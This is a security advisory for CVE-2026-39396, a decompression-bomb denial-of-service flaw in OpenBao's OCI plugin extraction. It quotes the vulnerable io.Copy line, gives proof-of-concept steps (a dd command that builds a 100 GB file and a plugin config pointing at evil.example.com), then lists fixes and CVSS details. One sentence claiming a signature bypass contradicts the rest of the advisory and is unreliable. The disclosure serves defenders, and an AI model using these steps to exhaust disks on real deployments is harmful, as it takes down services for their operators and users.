OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)
ExtractPluginFromImage() in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via io.Copy with no upper bound on the number of bytes written.
An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.
The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace legit plugin image with no need to change its signature.
helper/pluginutil/oci/downloader.go:301:
```go
if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {
```
io.Copy() reads until EOF with no size limit.
The tar header.Size field is never validated before the copy, and mutate.Extract decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.
1. Set up a malicious OCI registry
2. Create a decompression bomb binary:
```bash
dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary
```
3. Package it in a minimal OCI image
4. Push to the malicious registry
5. Configure victim OpenBao to use this registry:
```hcl
plugin "secrets" "bomb" {
image = "evil.example.com/plugin"
version = "v1.0.0"
binary_name = "openbao-plugin-secrets-bomb"
sha256sum = "0000000000000000000000000000000000000000000000000000000000000000"
}
plugin_auto_download = true
```
6. Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -> cause DoS
1. Validate header.Size against a configurable maximum before opening the output file
2. Wrap tarReader in io.LimitReader(tarReader, maxSize+1) and check bytes written after copy
3. Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)
This issue can be reached over the network, attack complexity is high, an attacker needs no privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability low.
The score comes from this vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L
CVE-2026-39396 is classified as CWE-400: Uncontrolled Resource Consumption. A request can consume memory, CPU or storage without limit, exhausting capacity for everyone else.
CVE-2026-39396 is recorded against 2 packages.
Published on 21 April 2026 and last revised on 27 July 2026. No public exploit is currently recorded for this entry. A vendor advisory or fix has been published. Record sourced from OSV.
github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)
github.com/openbao/openbao has other advisories on record. If you are patching this one, these are worth checking on the same host:
These advisories are the same class of weakness (CWE-400: Uncontrolled Resource Consumption) in other software:
Details
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| github.com/openbao/openbao | — | — |
| openbao | — | — |
References
Similar Threats
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